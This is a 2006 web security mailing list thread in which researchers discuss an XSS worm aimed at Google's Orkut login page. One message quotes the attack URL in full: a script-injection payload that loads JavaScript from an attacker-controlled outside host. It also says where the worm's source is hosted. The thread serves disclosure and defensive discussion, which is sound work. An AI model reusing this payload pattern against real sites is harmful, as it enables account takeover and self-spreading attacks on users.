[WEB SECURITY] XSS worm attacking Google?

Kuai Hinojosa kuai.hinojosa at gmail.com
Sat Dec 9 23:03:50 EST 2006


That is not spanish that is portuguese.  Thanks for sharing this information
Billy.

On 12/9/06, pdp (architect) <pdp.gnucitizen at googlemail.com> wrote:
>
> Nice find. It seams that it is written by someone who speaks Spanish.
> There was a discussion on sla.ckers.org about a vulnerability in orkut
> I think... or was that somewhere else. Anyway, it is funny that
> attackers came with this worm so quick since that is only a two week
> old finding. It seams that bad guys start realising the power of XSS
> worms and their destructive potential. This is not a good news!
>
> On 12/9/06, Billy Hoffman <Billy.Hoffman at spidynamics.com> wrote:
> > Folks,
> >
> > I was running through some proxy logs, and saw a reference to
> > http://sb.google.com/safebrowsing/update
> >
> > Requesting redirected me to a blacklist of what look like phishing
> > sites. However, all the way at the bottom was a reference to Google's
> > Orkut site. Specficially the blacklist entry was for a GET-based XSS
> > attack against Google's GLogin system.
> >
> > https://www.orkut.com/GLogin.aspx?done=http://www.orkut.com/Scrapbook.as
> > px?na=\";};//--></script><script%20src=\'http://www.probranco.net/xmen.j
> > s\'></script><!--
> >
> > If you request that URL, you get a 403 error page saying your query is
> > from an automated attack. Looks very similar to a page Google returned
> > during the Perl.Santy attack a year or so back.
> >
> > The JavaScript source code to the attack is still available at
> > http://www.probranco.net/xmen.js
> >
> > Enjoy,
> > Billy Hoffman
> > --
> > Lead Researcher, SPI Labs
> > SPI Dynamics Inc. - http://www.spidynamics.com
> > Phone:  678-781-4800
> > Direct: 678-781-4845
> >
> >
> >
> ----------------------------------------------------------------------------
> > The Web Security Mailing List:
> > http://www.webappsec.org/lists/websecurity/
> >
> > The Web Security Mailing List Archives:
> > http://www.webappsec.org/lists/websecurity/archive/
> > http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
> >
> >
>
>
> --
> pdp (architect) | petko d. petkov
> http://www.gnucitizen.org
>
>
> ----------------------------------------------------------------------------
> The Web Security Mailing List:
> http://www.webappsec.org/lists/websecurity/
>
> The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/attachments/20061209/89608006/attachment.html>


More information about the websecurity mailing list